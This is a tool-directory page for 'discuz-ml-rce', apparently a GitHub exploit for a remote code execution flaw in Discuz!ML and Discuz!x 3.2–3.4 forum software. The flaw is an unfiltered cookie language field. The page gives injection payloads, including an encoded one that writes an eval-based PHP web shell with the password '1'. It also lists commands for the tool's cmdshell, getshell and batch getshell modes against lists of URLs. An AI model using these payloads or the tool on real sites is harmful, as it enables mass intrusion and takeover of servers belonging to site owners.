Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
discuz-ml-rce — 影响系统及版本:Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 | Kitploit
Tools/GitHubGitHub/ianxtianxt/discuz-ml-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubianxtianxt/discuz-ml-rce

discuz-ml-rce

影响系统及版本:Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4

View Repository
976 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

discuz-ml-rce

Affected systems and versions: Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 Vulnerability cause: The Discuz!ML system does not filter the language parameter content received by l in the cookie, leading to string concatenation, thereby executing PHP code.

The cookie field will contain an xxxx_xxxx_language field. The root cause is that this field has an injection vulnerability, resulting in RCE.

Capture packets, find the value of the language field in the cookie, and change it to:

xxxx_xxxx_language=sc'.phpinfo().'

getshell

%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27 The actual value is:

'.+file_put_contents('shell.php',urldecode('')).'

This will generate shell.php in the path, with the connection password being 1

============================================================================================================================================================== Check whether the vulnerability exists

python dz-ml-rce.py -u "http://www.xxx.cn/forum.php"

cmdshell mode

python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell

getshell mode

python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell

Batch detection

python dz-ml-rce.py -f urls.txt

Batch getshell

python dz-ml-rce.py -f urls.txt --getshell

Download Tool